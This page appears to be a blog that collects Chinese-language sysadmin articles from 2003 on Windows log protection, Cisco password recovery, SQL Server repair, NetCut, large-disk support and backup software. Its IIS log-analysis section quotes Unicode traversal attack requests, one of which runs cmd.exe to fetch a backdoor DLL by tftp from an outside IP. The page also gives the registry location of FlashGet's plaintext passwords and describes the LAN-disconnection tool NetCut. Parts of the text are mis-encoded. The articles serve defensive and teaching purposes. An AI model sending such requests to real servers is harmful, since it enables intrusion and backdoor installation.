概述: Windows 系統日誌文件的保護、備份和分析

日期:2003-12-23

Windows系統以它的易用性倍受網管員的青睞,國內相當部分的大型網站都是用Windows 2000/XP系統建立的。Windows系統使用的人多了,研究它安全的人也多了。在此我要提醒一下網管們,雖然你補上了所有的安全補丁,但是誰又知道新的漏洞何時又會被發現呢?所以也應該做好系統日誌的保護工作。
作?黑客,他們也是最關心系統日誌的,一旦他們入侵成功,要做的第一件事就是刪除你的日誌文件,使你在被入侵後無法追蹤黑客行?,以及檢查黑客所做的操作行?。日誌文件就像飛機中的“黑匣子”一樣重要,因??堶惚O存著黑客入侵行?的所有罪證。

日誌的移位元與保護

Windows 2000的系統日誌文件包括:應用程式日誌、安全日誌、系統日誌、DNS服務日誌,以及FTP連接日誌和HTTPD日誌等。在默認情況下日誌文件大小?512KB,日誌保存的默認的位置如下:
安全日誌文件:%systemroot%system32config SecEvent.EVT
系統日誌文件:%systemroot%system32config SysEvent.EVT
應用程式日誌文件:%systemroot%system32config AppEvent.EVT
FTP連接日誌和HTTPD事務日誌:%systemroot% system32LogFiles,下面還有子文件夾,分別對應該FTP和Web服務的日誌,其對應的尾碼名?.Log。

在此筆者把系統默認?.EVT副檔名的日誌文件統稱為事件日誌,筆者看了好多文章介紹對事件日誌移位能做到很好的保護。移位雖是一種保護方法,但只要在命令行輸入dirc:*.evt/s(如系統安裝在D盤,則盤符?D),一下就可查找到事件日誌位置。日誌移位元要通過修改註冊表來完成,我們找到註冊表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置,下面的Application、Security、System幾個子鍵,分別對應“應用程式日誌”、“安全日誌”、“系統日誌”。如何修改註冊表,下面我們來看看Application子鍵。

File項就是“應用程式日誌”文件存放的位置,把此鍵值改?我們要存放日誌文件的文件夾,然後再把%systemroot%system32configappevent.evt文件拷貝到此文件夾,再重?機器。在此介紹移位元的目的是?了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位元也無法對文件進行安全設置操作,右擊移位後的文件夾選擇“屬性”,進入“安全”選項卡,不選擇“允許將來自父系的可繼承權限傳播給該物件”,添加“System”組,分別給Everyone組“讀取”許可權,System組選擇除“完全控制”和“修改”的許可權。然後再將系統默認的日誌文件512KB大小改?你所想要的大小,如20MB。
進行了上面的設置後,再直接通過Del C:*.Evt/s/q來刪除是刪不掉的;對系統正在使用的記錄文件在命令行形式中用上面的命令也是拒絕操作的。

日誌文件的備份

基於WMI技術的日誌備份腳本WMI(Windows Management Instrumentation)技術是微軟提供的Windows下的系統管理工具,基於WMI開發的腳本均可在Windows 2000/NT上成功運行。微軟提供了一個腳本,利用WMI將日誌文件大小設?25MB,並允許日誌自動覆蓋14天前的日誌。
我們只需把該腳本保存?.vbs副檔名的文件就可以使用,我們還可以修改上面的腳本來備份日誌文件,筆者在此建議,在備份日誌時一定將EVT的尾碼名改?其他尾碼保存(如.C),目的是讓攻擊者不易找到。
通過dumpel工具的備份
可用微軟Resource Kit工具箱中的dumpel.exe工具備份日誌文件,其格式?:
dumpel -f file [-s \server] [-l log [-m source]] [-e n1 n2 n3..] [-r]
[-t] [-dx]

-s \server 輸出遠端電腦日誌,如果是本地,這個可以省略。
-f filename 輸出日誌的位置和檔案名。
-l log log 可選?System,Security,Application,可能還有別的如DNS等。
如要把目標伺服器Server上的系統日誌轉存?Systemlog.log可以用如下格式:
dumpel \ server -l system -f Systemlog.log

如果利用計劃任務還可以實現定期備份系統日誌。

HTTPD事務日誌的分析

Microsoft的IIS5自公佈到現在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我們備份日誌的目的就是?了分析黑客入侵的行?,對於沒有打好補丁包的系統被黑客成功入侵的日誌記錄分別對應如下。
unicode漏洞入侵日誌記錄

我們打開IIS5的Web服務的日誌文件,日誌文件默認位置在%systemroot%system32LogFiles文件夾下,是一個典型的Unicode漏洞入侵行?的日誌記錄,對於正常的Web訪問,是通過80埠用GET命令獲取Web資料,但通過非法的字元編碼可繞過字元驗證而得到不應該得到的資訊。但補上相應的補丁可堵上此洞。

如通過下面的編碼查看目的機的目錄文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir200

則日誌中會記錄下此訪問行?:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -

然而我們的日誌中記錄的一清二楚,是來自192.168.0.1的攻擊者查看我們的目錄。而下面一行是向我們的機器傳送後門程式的記錄:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll
502 -

WebDavx3遠端溢出日誌記錄

最近在黑客界有名的Wevdavx3漏洞是應用最廣泛的,連打了最新SP3補丁的系統也不放過。如果系統遭受了此遠端溢出的攻擊行?。

我們看到圖中這樣的一行資訊:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……

就表示我們的Web服務受到了來自192.168.0.218的攻擊,並鎖定(即關閉)了WEB服務。後面的一些亂碼字元是在溢出攻擊時使用的偏移位猜過程。

上面都記錄了入侵行?的IP位址,此IP位址並不能排除是攻擊者使用了跳板,也就是說此IP很可能是“肉雞”而不是攻擊者的IP,但再查看其他日誌文件,還是有可能追查出攻擊者的位置。

資訊源:賽迪網 作者:徐建軍

FlashGet安全方式漏洞

描述:FlashGet的用戶名和密碼以明文方式存在註冊表,一般位置如下:
  
  [HKEY_USERS.DEFAULTSoftwareJetCarJetCarDialUp] "Entry"="" "UserName"="" "Password"=hex:

針對Cisco常見路由器 密碼和版本恢復方法的探討

日期:2003-12-29
隨著互聯網規模的不斷擴大,網路與我們的生活已經越來越近,許多政府,學校和公司都組建了自己的資訊網路,這使得路由器這一網路設備的使用越來越廣泛。在使用路由器的過程中經常會出現忘記密碼的事情,使維護人員無法登錄,影響工作的進一步開展。同時,在操作過程中有時會因為一些意想不到的原因,將路由器內部的版本映象文件損壞,使路由器無法正常工作,路由器退回到監控狀態,使用常用的版本拷貝命令無法更新版本。這兩個問題都是較常見,但又是初學者感到比較棘手的問題。
對於版本的獲得一般可以通過網站下載,或與供應商聯繫提供,也可以在路由器正常工作時利用常規命令將版本備份到伺服器上,以備應急之用。CISCO 路由器品種較多,各種路由器的密碼恢復和版本的災難恢復情況又不同,現分別?述。

一. 2500系列路由器(以2509?例)

1. 密碼恢復

1.1 利用DB25轉換介面,和交叉線將2509路由器的CONSOLE口和電腦串口相連,?動電腦超級終端,設置其參數?串列傳輸速率9600,資料位元8,奇偶校驗?無,停止位?1,流控選擇無。開?路由器電源,在開機60秒內按ctlr+break 使路由器進入rom monitor 狀態,提示符 >

1.2 查看configure –register 值,並將該值記下。

>e/s2000002

返回值正常時一般?2102

1.3 更新configure-register 值使路由器?動時跳過配置文件,直接?動,以便使原來的密碼不起作用。

>o/r0x0142

1.4 重新啟動路由器>i

1.5 啟動後進入特權模式,執行如下命令使原來的配置資訊有效。

router(config)#config mem

1.6 此時可以按照正常操作查看原來的密碼,或修改為新的密碼。

1.7 將configure-register 值復原,並重新啟動路由器。此時即可恢復正常。

Router(config)#configure-register 0x2102

Router(config)#wri

Router(config)#reload

2. 版本災難性恢復

與其他路由器不同的是2509在rom內部有一個引導監控模式,內含一個小的映象版本,當flash中版本損壞時,可以用於正式版本下載。

2.1在電腦串口和2509CONSLOE 口相連的同時,還必須準備一個AUI 與RJ45的轉換介面,以便可以使用交叉線將AUI口與電腦網口相連。

2.2在引導監控模式下,進入特權模式,配置乙太口的介面位址和遮罩,使其與電腦網口位址在同一子網,(假定電腦位址位元168.1.32.206 255.255.0.0 路由器乙太口位址位元168.1.32.207 255.255.0.0)

router(boot)#config t

router(boot)(config)#int ethernet 0

router(boot)(config-if)#ip address 168.1.32.207 255.255.0.0

2.3驗證網路互通性

router(boot)#ping 168.1.32.206

2.4 電腦上?動tftp伺服器,將需要下載的版本放在伺服器的指定目錄下。

2.5 在超級終端上執行如下命令:

router(boot)#copy tftp flash

將新的版本下載到路由器的flash中,

2.6重新?動路由器,運行新的正常版本

router(boot)#reload

二. 2600系列(以2621 ?例)

1. 密碼恢復

1.1將路由器的CONSOLE口和電腦串口相連,?動電腦超級終端,開?路由器電源,在開機60秒內按ctlr+break 使路由器進入rom monitor 狀態,提示符

rommon1>

1.2重新配置組態寄存器

rommon1>confreg

當出現 do you wish to change the configuration (y/n) 時 選擇y

接下來的選項選擇n

當出現 enable”ignore system configuration information”(y/n) 選擇y

接下來的選項選擇n

1.3 重新?動路由器

rommon1>reset

1.4 ?動後進入特權模式,執行如下命令使原來的配置資訊有效。

router(config)#config mem

1.5可以進一步查看密碼或更改密碼

2. 版本的災難性恢復

2621 提供了兩種災難性恢復版本的方法,tftpdnld 和 xmodem 方式。

2.1 tftpdnld方式

2.1.1將電腦串口和路由器CONSLE口相連,將電腦網口與路由器乙太口(一定要與第一個乙太口)相連

2.1.2 ?動TFTP伺服器,並將要下載的版本放於指定目錄下面。

2.1.3 開?路由器電源,由於沒有有效版本,路由器?動後將直接進入監控模式。

Rommon1>

2.1.4按如下命令設置參數。

Rommon2>IP_ADDRESS=168.1.32.207

Rommon3>IP_SUBNET_MASK=255.255.0.0

Rommon4>DEFAULT_GATEWAY=168.1.32.206

Rommon5>TFTP_FILE=c2600-i-mz.121-3.T

Rommon6>tftpdnld

以上假定電腦位址?168.1.32.206 255.255.0.0,命令IP_ADDRESS=168.1.32.207

在監控模式下將168.1.32.207位址配置到路由器的第一個乙太埠,從而建立起路由器與TFTP伺服器之間的連接,正常下載版本。

2.1.5 組態配置寄存器

Rommon7>confreg

當出現do you wish to change the configuration ?y/n 選擇y

其他選擇n

當出現 change the boot charaterist ?y/n 選擇 y

選擇參數2

2.1.6?動版本

Rommon8> reset

2.2 xmodem 方式下載

該種方式下載不需要乙太口電纜,只需超級終端即可。缺點是花費時間太多,速度太慢。Xmodem 是個人電腦通信中廣泛使用的非同步文件傳輸協定,以128位元組塊的形式傳輸資料,並且每個塊都進行校驗,,如果接受方校驗正確,則發送認可資訊,發送方發送下一個字塊。Ymodem 非同步傳輸協定,傳輸字塊大小?1024,增加了批次處理的功能。

2.2.1 用超級終端與路由器連接好後,?動路由器,路由器進入監控模式狀態。

Rommon1>

2.2.2 ?動xmodem 命令

Rommon2>xmodem –cx ? 敲入enter鍵

當出現do you wish to continous 時 選擇y

2.2.3 打開超級終端的“傳送”功能表,選擇傳送文件 則打開了傳送文件窗口。

輸入版本文件的位置,並選擇xmodem 方式,確認後,經過幾秒後,版本文件則會以xmodem的方式從電腦下載到路由器中。

修改相應命令和選項,也可以以ymodem的方式進行傳送。

2.2.4 以上述同樣的方法配置confreg 命令,重新?動後,路由器會進入正常狀態。

三. 3600系列路由器的密碼和版本恢復(以3640?例)

1. 密碼恢復

3640的密碼恢復和26系列基本相似,都是進入監控模式,運行confreg 命令,?動時忽略配置文件,進行直接?動。此方法同樣適用於4500 7500 12000系列路由器。

2. 版本恢復

3640 的版本恢復沒有提供tftpdnld命令,只提供了xmodem 命令,使用方法與26系列相同。

四. 幾種進入ROM 狀態的方法

對於cisco的各種路由器進入rom狀態的方法不盡相同,但一般通過如下三種方法可以進入rom狀態 ,在使用過程中可以分別試用進入。

4.1如果break 未被遮罩,可以在開機60秒內按ctl+break 鍵中斷?動過程,進入rom狀態。

4.2 如果break鍵已經遮罩,可以通過迴圈開機的方法進入rom狀態。

方法是:路由器開機後,將電源關閉。間隔5秒後重新開機,一般會進入rom狀態。此方法適用與7500 12000等路由器。

4.3將超級終端通訊串列傳輸速率設置?1200,資料位元8 ,奇偶位1 停止位無。開?路由器電源,?動後,關機。停5秒後,重新開機,同時一直按住空白鍵12秒後放開,等路由器?動完成後,重新更改超級終端位元預設值。通訊串列傳輸速率設置?9600,資料位元8 ,奇偶位1 停止位無 。重新連接後,從終端上可以看到已經進入rom 狀態。注意在串列傳輸速率位元1200時終端上沒有內容顯示。此方法適用於2500,2600,4500等系列路由器

五 結束語

作?三層設備,路由器在網路中擔任著尋找路由的作用,但路由器又是一種技術含量很高的網路設備,涉及的各種協定,技術面較廣,熟練運用各種路由器,及時處理各種突發故障對維護網路的正常運轉有著重要意義。本文通過比較全面的匯總,總結了常見路由器的密碼和版本的恢復方法,對處理常見的類似問題具有一定的指導作用。

當SQL Server資料庫崩潰時如何恢復?

任何資料庫系統都無法避免崩潰的狀況,即使你使用了Clustered,雙機熱備……仍然無法完全根除系統中的單點故障,何況對於大部分用戶來說,無法承受這樣昂貴的硬體投資。所以,在系統崩潰的時候,如何恢復原有的寶貴資料就成?一個極其重要的問題了。
  
  在恢復的時候,最理想的情況就是你的資料檔案和日誌文件都完好無損了,這樣只需要sp_attach_db,把資料檔案附加到新的資料庫上即可,或者在停機的時候把所有資料檔案(一定要有master等)都copy到原有路徑下也行,不過一般不推薦這樣的做法,sp_attach_db比較好,雖然麻煩許多。
  
  但是呢,一般資料庫崩潰的時候系統是未必能有時間把未完成的事務和髒頁等寫入磁片的,這樣的情況sp_attach_db就會失敗。那?,寄期望於DBA制定了一個良好的災難恢復計劃吧。按照你的恢復計劃,還原最新的完全備份,增量備份或者事務日誌備份,然後如果你的活動事務日誌還能讀得出來的話,恭喜你!你可以還原到崩潰前的狀態。
  
  一般的單位都是沒有專職的DBA的,如果沒有可用的備份,更可能是最近一次備份的時間過於久遠而導致不可接受的資料損失,而且你的活動事務日誌也處於不可用的狀態,那就是最麻煩的情況了。
  
  不幸的很的是,一般資料庫崩潰都是由於存儲子系統引起的,而這樣的情況是幾乎不可能有可用的日誌用於恢復的。
  
  那?就只好試一下這些方案了。當然,是要求至少你的資料檔案是存在的,要是資料檔案、日誌文件和備份都沒有了的話,別找我,你可以到樓頂上去唱“神啊,救救我吧”。
  
  首先,你可以試一下sp_attach_single_file_db,試著恢復一下你的資料檔案,雖然能恢復的可能性不大,不過假如這個資料庫剛好執行了一個checkpoint的話,還是有可能成功的。
  
  如果你沒有好到有摸彩票的手氣,最重要的資料庫沒有像你期盼的那樣attach上去,不要氣餒,還是有別的方案的。
  
  我們可以試著重新建立一個log,先把資料庫設置?emergency mode,sysdatabases的status?32768 就表示資料庫處於此狀態。
  
  不過系統表是不能隨便改的,設置一下先Use Master Go sp_configure 'allow updates', 1 reconfigure with override Go然後update sysdatabases set status = 32768 where name = ''
  
  現在,祈求滿天神佛的保佑吧,重新建立一個log文件。成功的機會還是相當大的,系統一般都會認可你新建立的日誌。如果沒有報告什?錯誤,現在就可以松一口氣了。
  
  雖然資料是恢復了,可是別以?事情就算完成了,正在進行的事務肯定是丟失了,原來的資料也可能受到一些損壞。
  
  先把SQL Server 重新?動一下,然後檢查你的資料庫吧。
  
  先設置成單用戶模式,然後做dbcc sp_dboption '', 'single user', 'true' DBCC CHECKDB('')
  
  如果沒有什?大問題就可以把資料庫狀態改回去了,記得別忘了把系統表的修改選項關掉。
  
  update sysdatabases set status = 28 where name = '' ——當然你的資料庫狀態可能不是這個,自己改?合適的值吧。也可以用sp_resetstatus go sp_configure 'allow updates', 0 reconfigure with override Go
  
  checkdb的時候可能報告有一些錯誤,這些錯誤的資料你可能就只好丟棄了。
  
  checkdb有幾種修復選項,自己看著用吧,不過最後你可能還是得REPAIR_ALLOW_DATA_LOSS,完成所有修復。
  
  chekcdb並不能完成所有的修復,我們需要更進一步的修復,用DBCC CHECKTABLE對每一個表做檢查吧。
  
  表的列表可以用sysobjects?堶控o到,把OBJECTPROPERTY是IsTable的全部找出來檢查一下吧,這樣能夠基本上解決問題了,如果還報告錯誤,試著把資料select into到另一張表檢查一下。
  
  這些都做完了之後,把所有索引、視圖、存儲過程、觸發器等重新建立一下。DBCC DBREINDEX也許可以幫你一些忙。
  
  上面提到的命令、物件在Books Online中均有詳細說明,請注意參看。

NetCut網管效率一級棒

 無論是在公司的大網路,或是家裡三五台電腦的小小網路,負責管理的人總會遇到一些困擾,像小張整天都在下載色情影片占用頻寬,小雪則是上班時間都在ICQ情話綿綿,家裡的小孩則是常常RO到兩三點……。

 身為網管(或家管)的你,難道就真的無計可施了嗎?

 Arcai公司的「網路斷線器」NetCut產品就是專門針對這種需求而設計的。下載處:seeder .net/lee/dl安裝完後要重新開機一次 ,點取桌面上的NetCut圖示即可進入主程式。程式執行後,會自動搜尋你的整個內部網路,將找到的每一台電腦的名稱及IP位址和網卡位址都列在左邊,而網路的閘道器(Router)則列在右邊。

 「網路斷線器」顧名思義就是可以讓你將網段中的任何一台電腦對外連線切斷!你只要在左邊清單中選取要切斷連線的主機,按下Cut Off按鈕,那台電腦就此不能上網了!(要讓他恢復連線只要按下Resume鍵即可)

 如果你是要讓某兩台電腦之間不能通訊的話,你要做的就不是切斷他們的Internet連線,而是要切斷他們彼此的連線:首先把右邊的 G ateway 位址按Del GateWay刪除,然後點選要切線的其中一員按>>鈕移到右邊,再於左邊點取另一位後,按Cut Off就可以切斷這兩點之間的連線了。

 「網路斷線器」雖然是網管的必殺利器,但如果使用的人是存心搗蛋的人,也一樣輕易的就可以把整個網路搞得雞飛狗跳。改天若您遇到了網路時通時不通的靈異現象時,別忘了也要祭出NetCut這個絕活,仔細核對上面的網卡號碼IP位址就可以抓出頑皮的傢伙囉!

硬碟容量變大了

 現在一顆160G的硬碟只要四千出頭,這麼大的容量用的著嗎?別忘了資訊界的一句名言:「硬碟愈大愈不夠大!」隨著硬碟容量的攀升,軟體及遊戲也肥腫了起來,更別提拚命下載來的大量MP3及影片要都要占用極大的容量。

 硬碟當然愈大愈好,但舊的ATA硬碟規格卻有 137GB的容量上限!雖然新的主機板及ATA硬碟都開始支援新的48bit LBA規格讓硬碟容量限制已放寬到天文數字般的 144155188 GB了,然而如果你真買一台大於137GB的硬碟裝在你新買的電腦上,恐怕馬上會因為Windows不支援這麼大的硬碟而被嚇一大跳!

 真的不支援嗎?事實上Windows 2000在SP3後就開始支援超大型ATA硬碟了,而Windows XP則在SP1之後也提供了超大容量ATA硬碟的支援。如果你不確定你的視窗版本,點開始→執行輸入Winver然後按Enter即可看到目前使用中的W indows版本及Service Pack版號。 (註: 如果版號較舊,建議立即做視窗更新Windows Upda te來更新你的Windows至最新狀態)

 不幸的是:就算你的Windows已更新至最新狀態,大於137GB的硬碟還是沒辦法直接使用!這是因為微軟沒有把這隱藏功能啟動。要啟用此功能,要先執行Regedit登錄編輯程式,然後找到這個選項:

 HKEY_LOCAL_MACHINE\System\CurrentContr olSet\Services\Atapi

 在Parameters上按滑鼠右鍵選新增→DWORD值,然後命名為EnableBigLba,命名完後點兩下 EnableBigLba將值填為1就搞定了!(設好後要關機重開才生效)

 若覺得太複雜的話直接下載執行Lee-1.com/ DL/BigDisk.reg 即可。

第一款針對Linux平臺設計的完整資料保護解決方案

CA BrightStor ARCserve Backup v9 for Linux

根據資策會的調查,國內有超過三成以上的企業和機關團體,所使用的網頁伺服器是建構在Linux平臺上,Linux作業系統的資料保護已成為軟體廠商重視的市場。CA(組合國際)推出的BrightStor ARCserve Backup v9 for Linux,便是針對中小企業Linux用戶資料保護需求設計的備分軟體。

在Linux環境下執行資料備分,管理者最常用的方法是利用tar、cpio等指令,將資料備分至磁帶機或磁碟,並配合shell script、crontab將備分工作自動化,不過上述的方法僅具備單純的備分/還原功能。雖然市面上也有支援Linux的備分,但僅限於代理程式(agent),並無完整的解決方案。BrightStor ARCserve Backup v9 for Linux(以下簡稱BAB9 for Linux)則是第一款專門針對Linux備分伺服器設計的備分軟體。

簡化的安裝授權程序

有別於BAB9另外兩個版本-Windows和Novell版本圖形介面安裝精靈的安裝方式,BAB9 for Linux必須在文字模式下,以輸入指令的方式進行安裝,不過安裝過程並不複雜。將安裝光碟置入光碟機並掛載之後,輸入安裝檔的路徑並執行即可。由於BAB9 for Linux已預先將大部分使用者會安裝的套件整理好,如果不是特殊情況,安裝過程通常只要透過文字導引,選擇預設值安裝即可。授權驗證模式也相當簡單,以測試時安裝的試用版光碟為例,安裝過程中會要求輸入序號,選擇不輸入序號跳過的話仍可順利安裝完成,不過僅提供一個月的試用期,在試用期間輸入授權碼即可轉成正式版。

BAB9 for Linux的安裝過程也相當快,筆者的測試平臺配備為Pentium 4 2.4GHz處理器、512MB記憶體和Red Hat 8.0作業系統,從開始安裝到啟動費時不到半小時。不過需注意的是,安裝前最好先詳細讀過安裝光碟內附的使用手冊,確認軟硬體的需求和相容性,尤其要注意BAB9 for Linux安裝必備的軟體套件,筆者在第一次安裝時,就因為少了Korn shell package(pdksh)而無法安裝成功,著實費了一番工夫才安裝起來。

透過IE即可操作管理

BAB9 for Linux提供兩種操作模式,一種是在本機端透過圖形介面管理,另一種則是透過啟動Java Applet的IE網路瀏覽器,登入管理網頁進行操作。為確保安全性,BAB9 for Linux具備兩層防護機制,首先是透過埠號管制,軟體預設的埠號為6060,使用者可自行定義,如果埠號不符,就算登入也無法正常使用;連線進入管理畫面之後,使用者必須輸入管理員的帳號密碼,認證通過之後才能操作。

使用過BAB9 for Windows版本的使用者會發現,兩者的操作介面幾乎是一模一樣,BAB9 for Linux同樣擁有多種精靈模式,像是備分/回存精靈、設備精靈、工作排程精靈等,協助使用者快速完成各項設定。BAB9 for Linux亦具備日曆式的工作排程介面,管理者只需用滑鼠點選,就可以輕鬆制定所需的備分政策。使用者更可透過類似檔案總管的管理控制臺,集中管理和監控多臺伺服器和儲存設備,無論伺服器採用的是Windows、Unix或Linux作業系統,皆可跨平臺管理,而且只要取得伺服器認證,就可從本機管理遠端的備分伺服器。

支援多項特殊功能

BAB9 for Windows所具備的一些獨家特殊功能,在BAB9 for Linux上同樣看得到,例如支援多重網路卡功能,可協助企業建立專屬的備分網路,將網路上的商業流量和資料保護流量分開,避免備分工作造成網路壅塞;支援備分資料至硬碟的虛擬磁帶庫功能,利用磁碟備分速度較快的特性,先將備分資料暫存至指定的磁碟空間,再備分至磁帶,以增加備分效率;支援NDMP(Network Data Management Protocol,網路資料管理協定),可利用NAS做為備分媒體,將資料快速備分在NAS上。

由於病毒猖獗,備分時很難確定備分資料是否有毒,有時甚至連備分伺服器自己都中毒,造成嚴重的資料損毀,有鑒於此,BAB9 for Linux整合了CA eTrust Antivirus病毒掃描引擎,可在資料轉移至儲存媒體前先行掃描是否有病毒,並加以修復或清除,雖然啟用掃毒機制會增加些許備分時間,不過為了安全起見卻是必要的。病毒掃描引擎同時也會自動更新病毒碼,確保不受最新病毒的威脅。

BAB9 for Linux另一項重要功能,是可透過選購的代理程式,線上(on-line)保護資料庫及網頁伺服器。一般Linux的備分指令或備分工具,僅能提供離線(off-line)備分功能,對於需要全天候運作的資料庫及網站來說,常會造成管理上的困擾。

一般Linux平臺上最多人使用的網頁伺服器軟體是Apache,而資料庫不外乎是MySQL和Oracle,BAB9 for Linux便提供以上三種軟體的代理程式,利用線上備分代理程式,可在網頁伺服器及資料庫運作的同時進行備分,毫不影響正在進行的工作,提供伺服器7天24小時的完整資料保護。

災難復原功能

導致伺服器停機的原因不一而足,可能是硬體故障、軟體中毒,也可能天災人禍等不可抗力因素,對系統管理者而言,最重要的問題是如何在災難發生後,用最快的時間恢復伺服器的正常運作,降低企業損失。

BAB9 for Linux支援的災難復原套件(Disaster Recovery Option),可以提供使用者在不需重新安裝作業系統和備分軟體情況下,迅速重建Linux的Ext3檔案系統及LILO、GRUB開機管理程式。

使用者需至CA網站下載ISO檔並自行燒錄成可開機光碟,並在平時準備好由BAB9 for Linux製作的開機軟碟片和全系統完整備分的磁帶,一旦伺服器停擺,只要依程序以軟碟和光碟開機之後,照著畫面的指示即可將系統還原至健康狀態。

較新的文章 較舊的文章 首頁